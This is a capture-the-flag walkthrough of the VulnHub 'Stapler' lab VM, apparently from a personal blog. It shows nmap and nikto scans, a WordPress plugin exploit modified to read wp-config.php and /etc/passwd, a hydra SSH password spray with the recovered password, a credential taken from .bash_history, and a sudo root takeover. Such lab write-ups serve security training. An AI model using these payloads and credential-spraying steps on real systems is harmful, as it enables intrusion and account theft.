Hello Everyone!, and welcome to my VulnHub VM Write-Ups!
Ok! The first thing we do is to set up our VM. You can download it from here.
If you’re all set then let’s begin our journey!!
About VM:
What we have to do is to get “root” access.
+---------------------------------------------------------+
| |
| __..--''\ |
| __..--'' \ |
| __..--'' __..--'' |
| __..--'' __..--'' | |
| \ o __..--''____....----"" |
| \__..--''\ |
| | \ |
| +----------------------------------+ |
| +----------------------------------+ |
| |
+- - - - - - - - - - - - - -|- - - - - - - - - - - - - - -+
| Name: Stapler | IP: DHCP |
| Date: 2016-June-08 | Goal: Get Root! |
| Author: g0tmi1k | Difficultly: ??? ;) |
+- - - - - - - - - - - - - -|- - - - - - - - - - - - - - -+
| |
| + Average beginner/intermediate VM, only a few twists |
| + May find it easy/hard (depends on YOUR background) |
| + ...also which way you attack the box |
| |
| + It SHOULD work on both VMware and Virtualbox |
| + REBOOT the VM if you CHANGE network modes |
| + Fusion users, you'll need to retry when importing |
| |
| + There are multiple methods to-do this machine |
| + At least two (2) paths to get a limited shell |
| + At least three (3) ways to get a root access |
| |
| + Made for BsidesLondon 2016 |
| + Slides: https://download.vulnhub.com/media/stapler/ |
| |
| + Thanks g0tmi1k, nullmode, rasta_mouse & superkojiman |
| + ...and shout-outs to the VulnHub-CTF Team =) |
| |
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - -+
| |
| --[[~~Enjoy. Have fun. Happy Hacking.~~]]-- |
| |
+---------------------------------------------------------+
Let the Hacking Begin…
The first thing we need to do is to get the IP of the VM. For this we use netdiscover.
root@kali:~# netdiscover
Currently scanning: Finished! | Screen View: Unique Hosts
2 Captured ARP Req/Rep packets, from 2 hosts. Total size: 84
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.1.2 [......!!!....] 1 42 Honda Electronics Co.,Ltd
192.168.1.7 [......!!!....] 1 42 PCS Systemtechnik GmbH
__192.168.1.7__ will be our target. Let’s do the nmap scan on our target to enumerate open ports and services.
root@kali:~/Stapler# nmap -sS -A -O -n -p1-60000 192.168.1.7
Starting Nmap 7.70 ( https://nmap.org ) at 2019-02-20 11:37 IST
Nmap scan report for 192.168.1.7
Host is up (0.00070s latency).
Not shown: 59988 filtered ports
PORT STATE SERVICE VERSION
20/tcp closed ftp-data
21/tcp open ftp vsftpd 2.0.8 or later
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_Can't get directory listing: PASV failed: 550 Permission denied.
| ftp-syst:
| STAT:
| FTP server status:
| Connected to 192.168.1.3
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 3
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 81:21:ce:a1:1a:05:b1:69:4f:4d:ed:80:28:e8:99:05 (RSA)
| 256 5b:a5:bb:67:91:1a:51:c2:d3:21:da:c0:ca:f0:db:9e (ECDSA)
|_ 256 6d:01:b7:73:ac:b0:93:6f:fa:b9:89:e6:ae:3c:ab:d3 (ED25519)
53/tcp open domain dnsmasq 2.75
| dns-nsid:
|_ bind.version: dnsmasq-2.75
80/tcp open http PHP cli server 5.5 or later
|_http-title: 404 Not Found
123/tcp closed ntp
137/tcp closed netbios-ns
138/tcp closed netbios-dgm
139/tcp open netbios-ssn Samba smbd 4.3.9-Ubuntu (workgroup: WORKGROUP)
666/tcp open doom?
| fingerprint-strings:
| NULL:
| message2.jpgUT
| QWux
| "DL[E
| #;3[
| \xf6
| u([r
| qYQq
| Y_?n2
| 3&M~{
| 9-a)T
| L}AJ
|_ .npy.9
3306/tcp open mysql MySQL 5.7.12-0ubuntu1
| mysql-info:
| Protocol: 10
| Version: 5.7.12-0ubuntu1
| Thread ID: 7
| Capabilities flags: 63487
| Some Capabilities: DontAllowDatabaseTableColumn, SupportsLoadDataLocal, ConnectWithDatabase, SupportsCompression, Speaks41ProtocolNew, LongPassword, ODBCClient, Support41Auth, Speaks41ProtocolOld, SupportsTransactions, IgnoreSigpipes, InteractiveClient, IgnoreSpaceBeforeParenthesis, LongColumnFlag, FoundRows, SupportsAuthPlugins, SupportsMultipleResults, SupportsMultipleStatments
| Status: Autocommit
| Salt: #\x0F[u3^\x03g5N9aEW}u\x02uV3
|_ Auth Plugin Name: 88
12380/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port666-TCP:V=7.70%I=7%D=2/20%Time=5C6CEF06%P=x86_64-pc-linux-gnu%r(NUL
SF:L,25A8,"PK\x03\x04\x14\0\x02\0\x08\0d\x80\xc3Hp\xdf\x15\x81\xaa,\0\0\x1
SF:52\0\0\x0c\0\x1c\0message2\.jpgUT\t\0\x03\+\x9cQWJ\x9cQWux\x0b\0\x01\x0
SF:4\xf5\x01\0\0\x04\x14\0\0\0\xadz\x0bT\x13\xe7\xbe\xefP\x94\x88\x88A@\xa
SF:2\x20\x19\xabUT\xc4T\x11\xa9\x102>\x8a\xd4RDK\x15\x85Jj\xa9\"DL\[E\xa2\
SF:x0c\x19\x140<\xc4\xb4\xb5\xca\xaen\x89\x8a\x8aV\x11\x91W\xc5H\x20\x0f\x
SF:b2\xf7\xb6\x88\n\x82@%\x99d\xb7\xc8#;3\[\r_\xcddr\x87\xbd\xcf9\xf7\xaeu
SF:\xeeY\xeb\xdc\xb3oX\xacY\xf92\xf3e\xfe\xdf\xff\xff\xff=2\x9f\xf3\x99\xd
SF:3\x08y}\xb8a\xe3\x06\xc8\xc5\x05\x82>`\xfe\x20\xa7\x05:\xb4y\xaf\xf8\xa
SF:0\xf8\xc0\^\xf1\x97sC\x97\xbd\x0b\xbd\xb7nc\xdc\xa4I\xd0\xc4\+j\xce\[\x
SF:87\xa0\xe5\x1b\xf7\xcc=,\xce\x9a\xbb\xeb\xeb\xdds\xbf\xde\xbd\xeb\x8b\x
SF:f4\xfdis\x0f\xeeM\?\xb0\xf4\x1f\xa3\xcceY\xfb\xbe\x98\x9b\xb6\xfb\xe0\x
SF:dc\]sS\xc5bQ\xfa\xee\xb7\xe7\xbc\x05AoA\x93\xfe9\xd3\x82\x7f\xcc\xe4\xd
SF:5\x1dx\xa2O\x0e\xdd\x994\x9c\xe7\xfe\x871\xb0N\xea\x1c\x80\xd63w\xf1\xa
SF:f\xbd&&q\xf9\x97'i\x85fL\x81\xe2\\\xf6\xb9\xba\xcc\x80\xde\x9a\xe1\xe2:
SF:\xc3\xc5\xa9\x85`\x08r\x99\xfc\xcf\x13\xa0\x7f{\xb9\xbc\xe5:i\xb2\x1bk\
SF:x8a\xfbT\x0f\xe6\x84\x06/\xe8-\x17W\xd7\xb7&\xb9N\x9e<\xb1\\\.\xb9\xcc\
SF:xe7\xd0\xa4\x19\x93\xbd\xdf\^\xbe\xd6\xcdg\xcb\.\xd6\xbc\xaf\|W\x1c\xfd
SF:\xf6\xe2\x94\xf9\xebj\xdbf~\xfc\x98x'\xf4\xf3\xaf\x8f\xb9O\xf5\xe3\xcc\
SF:x9a\xed\xbf`a\xd0\xa2\xc5KV\x86\xad\n\x7fou\xc4\xfa\xf7\xa37\xc4\|\xb0\
SF:xf1\xc3\x84O\xb6nK\xdc\xbe#\)\xf5\x8b\xdd{\xd2\xf6\xa6g\x1c8\x98u\(\[r\
SF:xf8H~A\xe1qYQq\xc9w\xa7\xbe\?}\xa6\xfc\x0f\?\x9c\xbdTy\xf9\xca\xd5\xaak
SF:\xd7\x7f\xbcSW\xdf\xd0\xd8\xf4\xd3\xddf\xb5F\xabk\xd7\xff\xe9\xcf\x7fy\
SF:xd2\xd5\xfd\xb4\xa7\xf7Y_\?n2\xff\xf5\xd7\xdf\x86\^\x0c\x8f\x90\x7f\x7f
SF:\xf9\xea\xb5m\x1c\xfc\xfef\"\.\x17\xc8\xf5\?B\xff\xbf\xc6\xc5,\x82\xcb\
SF:[\x93&\xb9NbM\xc4\xe5\xf2V\xf6\xc4\t3&M~{\xb9\x9b\xf7\xda-\xac\]_\xf9\x
SF:cc\[qt\x8a\xef\xbao/\xd6\xb6\xb9\xcf\x0f\xfd\x98\x98\xf9\xf9\xd7\x8f\xa
SF:7\xfa\xbd\xb3\x12_@N\x84\xf6\x8f\xc8\xfe{\x81\x1d\xfb\x1fE\xf6\x1f\x81\
SF:xfd\xef\xb8\xfa\xa1i\xae\.L\xf2\\g@\x08D\xbb\xbfp\xb5\xd4\xf4Ym\x0bI\x9
SF:6\x1e\xcb\x879-a\)T\x02\xc8\$\x14k\x08\xae\xfcZ\x90\xe6E\xcb<C\xcap\x8f
SF:\xd0\x8f\x9fu\x01\x8dvT\xf0'\x9b\xe4ST%\x9f5\x95\xab\rSWb\xecN\xfb&\xf4
SF:\xed\xe3v\x13O\xb73A#\xf0,\xd5\xc2\^\xe8\xfc\xc0\xa7\xaf\xab4\xcfC\xcd\
SF:x88\x8e}\xac\x15\xf6~\xc4R\x8e`wT\x96\xa8KT\x1cam\xdb\x99f\xfb\n\xbc\xb
SF:cL}AJ\xe5H\x912\x88\(O\0k\xc9\xa9\x1a\x93\xb8\x84\x8fdN\xbf\x17\xf5\xf0
SF:\.npy\.9\x04\xcf\x14\x1d\x89Rr9\xe4\xd2\xae\x91#\xfbOg\xed\xf6\x15\x04\
SF:xf6~\xf1\]V\xdcBGu\xeb\xaa=\x8e\xef\xa4HU\x1e\x8f\x9f\x9bI\xf4\xb6GTQ\x
SF:f3\xe9\xe5\x8e\x0b\x14L\xb2\xda\x92\x12\xf3\x95\xa2\x1c\xb3\x13\*P\x11\
SF:?\xfb\xf3\xda\xcaDfv\x89`\xa9\xe4k\xc4S\x0e\xd6P0");
MAC Address: 08:00:27:B9:08:22 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: Host: RED; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_clock-skew: mean: 5h29m58s, deviation: 0s, median: 5h29m58s
|_nbstat: NetBIOS name: RED, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.3.9-Ubuntu)
| Computer name: red
| NetBIOS computer name: RED\x00
| Domain name: \x00
| FQDN: red
|_ System time: 2019-02-20T11:39:22+00:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2019-02-20 17:09:22
|_ start_date: N/A
TRACEROUTE
HOP RTT ADDRESS
1 0.70 ms 192.168.1.7
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 144.38 seconds
This is awesome!!! We got a lot of things. So many open ports and services.
- FTP
- NetBios
- MySQL
- Port 12380
- Apache HTTPD
Let’s run nikto on Port 12380.
root@kali:~/Stapler# nikto -h 192.168.1.7:12380
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.1.7
+ Target Hostname: 192.168.1.7
+ Target Port: 12380
---------------------------------------------------------------------------
+ SSL Info: Subject: /C=UK/ST=Somewhere in the middle of nowhere/L=Really, what are you meant to put here?/O=Initech/OU=Pam: I give up. no idea what to put here./CN=Red.Initech/emailAddress=pam@red.localhost
Ciphers: ECDHE-RSA-AES256-GCM-SHA384
Issuer: /C=UK/ST=Somewhere in the middle of nowhere/L=Really, what are you meant to put here?/O=Initech/OU=Pam: I give up. no idea what to put here./CN=Red.Initech/emailAddress=pam@red.localhost
+ Start Time: 2019-02-20 11:49:34 (GMT5.5)
---------------------------------------------------------------------------
+ Server: Apache/2.4.18 (Ubuntu)
+ Server leaks inodes via ETags, header found with file /, fields: 0x15 0x5347c53a972d1
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ Uncommon header 'dave' found, with contents: Soemthing doesn't look right here
+ The site uses SSL and the Strict-Transport-Security HTTP header is not defined.
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Entry '/admin112233/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/blogblog/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ "robots.txt" contains 2 entries which should be manually viewed.
+ Hostname '192.168.1.7' does not match certificate's names: Red.Initech
+ Allowed HTTP Methods: POST, OPTIONS, GET, HEAD
+ Uncommon header 'x-ob_mode' found, with contents: 1
+ OSVDB-3233: /icons/README: Apache default file found.
+ /phpmyadmin/: phpMyAdmin directory found
+ 7690 requests: 0 error(s) and 14 item(s) reported on remote host
+ End Time: 2019-02-20 11:55:14 (GMT5.5) (340 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
Ok! what we got
- /phpmyadmin/
- /robots.txt/
- /blogblog/
- /admin112233/
We have to change the “http” to “https” and navigate to robots.txt through https:192.168.1.7:12380/robots.txt
Then we will go to the /blogblog/ page. Ok! So this is a WordPress site. Let’s navigate to /blogblog/wp-content/plugins and we found that “advanced-video-embed-embed-videos-or-playlists” is vulnerable.
Let’s search in searchsploit.
root@kali:~/Stapler# searchsploit advanced video
--------------------------------------- ----------------------------------------
Exploit Title | Path
| (/usr/share/exploitdb/)
--------------------------------------- ----------------------------------------
WordPress Plugin Advanced Video 1.0 - | exploits/php/webapps/39646.py
--------------------------------------- ----------------------------------------
Shellcodes: No Result
Let’s modify the exploit.
gedit /usr/share/exploitdb/exploits/php/webapps/39646.py
And then add
import ssl
ssl._create_default_https_context = ssl._create_unverified_context
Once modified. Let’s execute it.
python /usr/share/exploitdb/exploits/php/webapps/39646.py
Now navigate to https://192.168.1.7:12380/blogblog/wp-content/uploads and we see an image file.
root@kali:~/Stapler# curl https://192.168.1.7:12380/blogblog/wp-content/uploads/1849276648.jpeg -k -s | head -n30
<?php
/**
* The base configurations of the WordPress.
*
* This file has the following configurations: MySQL settings, Table Prefix,
* Secret Keys, and ABSPATH. You can find more information by visiting
* {@link https://codex.wordpress.org/Editing_wp-config.php Editing wp-config.php}
* Codex page. You can get the MySQL settings from your web host.
*
* This file is used by the wp-config.php creation script during the
* installation. You don't have to use the web site, you can just copy this file
* to "wp-config.php" and fill in the values.
*
* @package WordPress
*/
// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define('DB_NAME', 'wordpress');
/** MySQL database username */
define('DB_USER', 'root');
/** MySQL database password */
define('DB_PASSWORD', 'plbkac');
/** MySQL hostname */
define('DB_HOST', 'localhost');
/** Database Charset to use in creating database tables. */
We got a password plbkac.
Now log in into MySql
root@kali:~/Stapler# mysql -u root -p -h 192.168.1.7
Enter password:
Welcome to the MariaDB monitor. Commands end with ; or \g.
Your MySQL connection id is 15
Server version: 5.7.12-0ubuntu1 (Ubuntu)
Copyright (c) 2000, 2017, Oracle, MariaDB Corporation Ab and others.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
MySQL [(none)]>
I tried but nothing came up. Then I opened the python exploit again.
gedit /usr/share/exploitdb/exploits/php/webapps/39646.py
And this url has something. Let’s modify it
# POC - http://127.0.0.1/wordpress/wp-admin/admin-ajax.php?action=ave_publishPost&title=random&short=1&term=1&thumb=[FILEPATH]
After Modification
https://192.168.1.7:12380/blogblog/wp-admin/admin-ajax.php?action=ave_publishPost&title=random&short=1&term=1&thumb=/etc/passwd
Then navigating this link I got a new url
https://192.168.1.7:12380/blogblog/?p=230
When we go to this link it says its broken.
Okk! Lets navigate to https://192.168.1.7:12380/blogblog/wp-content/uploads. We can see another image file.
Let’s download it.
root@kali:~/Stapler# wget --no-check-certificate https://192.168.1.7:12380/blogblog/wp-content/uploads/1852469253.jpeg
--2019-02-20 14:05:44-- https://192.168.1.7:12380/blogblog/wp-content/uploads/1852469253.jpeg
Connecting to 192.168.1.7:12380... connected.
WARNING: The certificate of ‘192.168.1.7’ is not trusted.
WARNING: The certificate of ‘192.168.1.7’ hasn't got a known issuer.
The certificate's owner does not match hostname ‘192.168.1.7’
HTTP request sent, awaiting response... 200 OK
Length: 2908 (2.8K) [image/jpeg]
Saving to: ‘1852469253.jpeg.1’
1852469253.jpeg.1 100%[===================>] 2.84K --.-KB/s in 0s
2019-02-20 14:05:44 (29.3 MB/s) - ‘1852469253.jpeg.1’ saved [2908/2908]
root@kali:~/Stapler# cat 1852469253.jpeg | grep /bin/bash
RNunemaker:x:1001:1001::/home/RNunemaker:/bin/bash
ETollefson:x:1002:1002::/home/ETollefson:/bin/bash
DSwanger:x:1003:1003::/home/DSwanger:/bin/bash
AParnell:x:1004:1004::/home/AParnell:/bin/bash
SHayslett:x:1005:1005::/home/SHayslett:/bin/bash
MBassin:x:1006:1006::/home/MBassin:/bin/bash
JBare:x:1007:1007::/home/JBare:/bin/bash
LSolum:x:1008:1008::/home/LSolum:/bin/bash
MFrei:x:1010:1010::/home/MFrei:/bin/bash
SStroud:x:1011:1011::/home/SStroud:/bin/bash
JKanode:x:1013:1013::/home/JKanode:/bin/bash
CJoo:x:1014:1014::/home/CJoo:/bin/bash
Drew:x:1020:1020::/home/Drew:/bin/bash
jess:x:1021:1021::/home/jess:/bin/bash
SHAY:x:1022:1022::/home/SHAY:/bin/bash
mel:x:1024:1024::/home/mel:/bin/bash
zoe:x:1026:1026::/home/zoe:/bin/bash
NATHAN:x:1027:1027::/home/NATHAN:/bin/bash
elly:x:1029:1029::/home/elly:/bin/bash
root@kali:~/Stapler# cat 1852469253.jpeg | grep /bin/bash | cut -d ":" -f1
RNunemaker
ETollefson
DSwanger
AParnell
SHayslett
MBassin
JBare
LSolum
MFrei
SStroud
JKanode
CJoo
Drew
jess
SHAY
mel
zoe
NATHAN
elly
root@kali:~/Stapler# cat 1852469253.jpeg | grep /bin/bash | cut -d ":" -f1 > users.txt
We saved the Users list into users.txt.
Now let’s use hydra against SSH service with password plbkac we got earlier and the Users list we got.
root@kali:~/Stapler# hydra ssh://192.168.1.7 -L users.txt -p plbkac
Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
Hydra (http://www.thc.org/thc-hydra) starting at 2019-02-20 14:13:57
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 19 login tries (l:19/p:1), ~2 tries per task
[DATA] attacking ssh://192.168.1.7:22/
[22][ssh] host: 192.168.1.7 login: zoe password: plbkac
1 of 1 target successfully completed, 1 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 2019-02-20 14:14:18
We go a user zoe. Cool! Let’s move ahead
root@kali:~/Stapler# ssh -l zoe 192.168.1.7
-----------------------------------------------------------------
~ Barry, don't forget to put a message here ~
-----------------------------------------------------------------
zoe@192.168.1.7's password:
Welcome back!
zoe@red:~$
On enumeration I got the .bash_history file.
zoe@red:/home$ cd JKanode
zoe@red:/home/JKanode$ ls -la
total 24
drwxr-xr-x 2 JKanode JKanode 4096 Jun 5 2016 .
drwxr-xr-x 32 root root 4096 Jun 4 2016 ..
-rw-r--r-- 1 JKanode JKanode 167 Jun 5 2016 .bash_history
-rw-r--r-- 1 JKanode JKanode 220 Sep 1 2015 .bash_logout
-rw-r--r-- 1 JKanode JKanode 3771 Sep 1 2015 .bashrc
-rw-r--r-- 1 JKanode JKanode 675 Sep 1 2015 .profile
Let’s open it
zoe@red:/home/JKanode$ cat .bash_history
id
whoami
ls -lah
pwd
ps aux
sshpass -p thisimypassword ssh JKanode@localhost
apt-get install sshpass
sshpass -p JZQuyIN5 peter@localhost
ps -ef
top
kill -9 3747
exit
We got password for peter – JZQuyIN5. Let’s use it.
zoe@red:/home/JKanode$ su peter
Password:
peter@red:/home/JKanode$ cd
peter@red:~$
Let’s Enumerate
peter@red:~$ cd /
peter@red:/$ ls
bin etc lib mnt root snap tmp vmlinuz.old
boot home lost+found opt run srv usr
dev initrd.img.old media proc sbin sys var
peter@red:/$ cd root
bash: cd: root: Permission denied
Try to change the root password
peter@red:/$ sudo passwd root
We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:
#1) Respect the privacy of others.
#2) Think before you type.
#3) With great power comes great responsibility.
[sudo] password for peter:
Enter new UNIX password:
Retype new UNIX password:
passwd: password updated successfully
Let’s move to root
peter@red:/$ su root
Password:
➜ / whoami
root
➜ / id
uid=0(root) gid=0(root) groups=0(root)
Finally we did it.
Move on and grab the winning Flag.
➜ / ls
bin etc lib mnt root snap tmp vmlinuz.old
boot home lost+found opt run srv usr
dev initrd.img.old media proc sbin sys var
➜ / cd root
➜ ~ ls
fix-wordpress.sh flag.txt issue python.sh wordpress.sql
➜ ~ cat flag.txt
~~~~~~~~~~<(Congratulations)>~~~~~~~~~~
.-'''''-.
|'-----'|
|-.....-|
| |
| |
_,._ | |
__.o` o`"-. | |
.-O o `"-.o O )_,._ | |
( o O o )--.-"`O o"-.`'-----'`
'--------' ( o O o)
`----------`
b6b545dc11b7a270f4bad23432190c75162c4a2b
➜ ~
Woo-hoo!!!
Leave a comment